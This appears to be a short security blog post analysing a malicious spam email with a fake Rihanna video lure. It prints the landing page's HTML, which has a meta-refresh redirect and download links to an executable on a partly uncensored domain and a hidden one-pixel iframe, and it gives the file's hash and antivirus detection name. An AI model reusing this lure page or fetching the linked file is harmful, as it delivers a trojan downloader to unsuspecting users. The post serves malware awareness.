Hi,
Usually Spam is targeted to Marketing Massive Action, that does not contains any form of Malicious Code, but in the last period there is a second collateral and heavly emerging trend (especially into Web Applications that allows comments, as Blogs) is the Malicious Spam, an apparent mail of Spam that redirects you to malicious code..
Here the latest Malicious Spam Mail that I’ve received on my gmail account:
Subject: mp3 Shocking for evilcry
Content: Rihanna New video!!!
Look It now
The malicious link points to http://ro{CENSORED}eel.com/index1.php
By dissecting the malicious link we can see that a redirection is done
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>
<html>
<head>
<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=http://robbiereel.com/video3425gdf3.exe”>
<title></title>
</head>
<body style=”background:#ffffff;”>
<iframe src=”http://ro{CENSORED}l.com/pindex.php” style=”width:1px; height:1px;”></iframe><br>
<div style=”text-align:center; padding-top:50px;”>
<a href=”http://ro{CENSORED}l.com/video3425gdf3.exe” style=”font-weight:bold;”><img src=”wait.gif” style=”border:0px;”></a><br>
<br>
<a href=”http://r{CENSORED}l.com/video3425gdf3.exe” style=”font-weight:bold; color:#364980; font-size:17px;”>Download Video</a>
</div>
</body>
</html>
The technique is always the same, a fake Video.exe that the Victim download and executes, in this case the malware is named video3425gdf3.exe
Let’s analyse video3425gdf3.exe
File: video3425gdf3.exe
MD5: acd73c4930e8191fa7a35dac448d7f4b
Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Agent.aacg
Posted by evilcodecave 
